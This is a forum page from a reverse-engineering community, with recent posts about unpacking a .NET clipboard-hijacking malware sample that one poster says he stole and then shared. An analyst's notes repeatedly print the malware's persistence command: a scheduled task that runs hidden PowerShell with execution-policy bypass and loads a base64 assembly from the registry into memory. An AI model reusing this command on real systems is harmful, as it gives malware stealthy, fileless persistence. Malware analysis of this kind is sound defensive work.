Tuts 4 You

Forums

  1. Community Discussions

    1. Terms, Privacy Policy & Frequently Asked Questions (151,071 visits to this link)
       Very important! Please read before signing up and posting...

    2. General Discussions and Off Topic
       General and off-topic conversations and discussions here... (12.9k posts)

    3. Artscene Community
       Share graphic, ASCII, module, demo, intro ideas and works... (7.4k posts)

    4. Site Bug Reports and Feedback
       Bugs, feedback and ideas regarding this site... (2.2k posts)

  2. Reverse Code Engineering

    1. Challenge of Reverse Engineering
       Try a challenge or contribute your own, any platform or operating system... (13.3k posts)

    2. Hardware Reverse Engineering
       Reverse engineering of circuitry hardware and firmware... (191 posts)

    3. Network Security
       Discussions on network security, holes, exploits and other issues... (454 posts)

    4. Malware Reverse Engineering
       Debugging, disassembling and documenting interesting malware... (1.5k posts)

    5. Reverse Engineering Articles
       Share an interesting blog, news page or other RE related site... (1.9k posts)

    6. Employment and Careers
       Discussions on employment and career paths in the industry... (157 posts)

  3. Developers Forums

    1. Programming and Coding
       Programming and coding tips, help and solutions... (12k posts)

    2. Programming Resources
       Share an interesting blog, news page or other resource... (307 posts)

    3. Software Security
       Securing your software against reverse engineering... (764 posts)

  4. Community Projects

    1. Scylla Imports Reconstruction
       Development and support forum for the Scylla project... (497 posts)

    2. x64dbg
       An open-source x64/x32 debugger for Windows... (1.2k posts)

    3. Future Community Projects
       Looking for support and interested partners for a future project? (130 posts)

    4. Community Projects Archive
       Old and inactive projects moved to long term support... (803 posts)
  • Member Statistics

    Total Members: 15,268
    Most Online: 7,713
    Newest Member: daredevil (joined)
  • Posts

    • BlackHat
      Unpacked this crap LOL. Here you go with the file: Kthmngiucgrhcdpxszzwg_BH_unp.dll
    • JoseCmanXDll
      Yep, he tried to bypass Windows Defender to make the payload run in memory by converting his payload to base64, I see (based on the PowerShell command). With those strong packers I don't think it's possible to unpack this crap.
    • Apuromafo
      Some simple notes, only for analysis:

      Step 0: exe in dnSpy.
      Step 1: extract the resource and save it as .zip.
      Step 2: the .exe in that zip is the program (malware) DLL in .NET, packed with Microsoft Visual C# / Basic.NET - IntelliLock v.1.5.x.0 (.NET Reactor) (Kthmngiucgrhcdpxszzwg.dll). It is executed with something like this:

      C:\Windows\System32\schtasks.exe" /create /sc minute /mo 10 /tn Fvupm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)"

      VirusTotal: https://www.virustotal.com/gui/file/5694a409003d8f855a17761d9ebce7cfd0f30490fa5340d9a3e1b55ce75cd5be/behavior

      Processes Created:
      C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)

      Shell Commands:
      schtasks /create /sc minute /mo 10 /tn Fvupm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)"

      Processes Terminated:
      C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)

      Processes Tree:
      2120 - Unpack me.exe
      2628 - C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)

      Packer? VMProtect + IntelliLock, or some obfuscator like ILProtector + IntelliLock.

      Best regards, Apuromafo
    • JoseCmanXDll
      This malware belongs to some famous coders; he sells it for over $100. I somehow managed to steal it from someone who bought it. It's malware that uses PowerShell; it only accesses the clipboard to replace it but doesn't steal data. I don't know more about it. The packer had me so confused. Unpack it if you can. Edit: if it gets unpacked I will share the seller's website! Unpack me.rar
    • LCF-AT
      Hi again, I just have some more little questions about the firewall rules. As I see it, I just need to create 2 new rules to BLOCK all IN & OUT going connections, as I posted one post above. It seems that I also need to change the firewall settings themselves for all domains, which means I have to 1) enable the firewall and 2) set the In & Out Bound connection settings to block. Maybe it's just optional, so I'm not sure yet whether it's enough to just ENABLE the firewall and create my 2 rules which should block all.

      Now I was looking at how I can find out the firewall settings to back them up before I change them. As I see it, I can read them from the registry and change them there. ... So that means I can read the parameters from the registry of all 3 domains and back them up so far. So my question now is whether I "must or not" change the main IN & OUT Bound parameters (to any state) IF I have created my own block rule? It's a bit confusing. Let's say I just enable the firewall for all domains and the In & Out settings above are set to allowed, BUT I have created an In & Out rule to Block All. What happens then? Otherwise, when I set the InBound setting to Block All, then I also don't need to create a rule for In Bound. So at the end I just want to block all In & Out connections and then restore the original state back. If anyone has some more hints on how the settings here must be set correctly to Block ALL (In/out/under/over/whatever directions they are coming from), then just tell me.

      PS: Does it play a role whether I enable the firewall with the netsh command (CreateProcess/Cmd) or change it directly in the registry (using Reg functions to set)? I must use the Reg functions to read the states. greetz